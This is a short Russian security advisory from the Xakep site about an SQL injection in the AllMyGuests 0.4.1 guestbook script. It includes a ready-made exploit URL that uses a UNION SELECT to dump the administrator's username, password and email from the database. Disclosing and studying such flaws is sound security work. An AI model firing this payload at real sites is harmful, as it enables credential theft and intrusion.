SQL-инъекция в AllMyGuests

Рекомендуем почитать:

Xakep #299. Sysmon

Программа: AllMyGuests 0.4.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3, concat_ws(0x203a20,user_name,user_password,user_email),5,6,7 +from+allmyphp_user+where+user_id=1--

http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id= null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password, user_email),5,6,7+from+allmyphp_user+where+user_id=1--

SQL-инъекция в AllMyGuests

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Виртуальная магия. Используем эмуляцию и виртуализацию для пивотинга

HTB Napper. Реверсим приложение на Go и пишем декриптор при помощи ChatGPT

Охлади себе всё. Собираем контроллер оборотов для компьютерных кулеров

MEGANews. Самые важные события в мире инфосека за апрель

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Инструмент CCTV позволяет узнать местоположение пользователей Telegram

Атака TunnelVision приводит к утечке VPN-трафика

Критический баг в Tinyproxy угрожает 50 000 систем

Шифровальщик MorLock увеличивает интенсивность атак на российский бизнес

Власти США заявили, что админом LockBit является россиянин Дмитрий Хорошев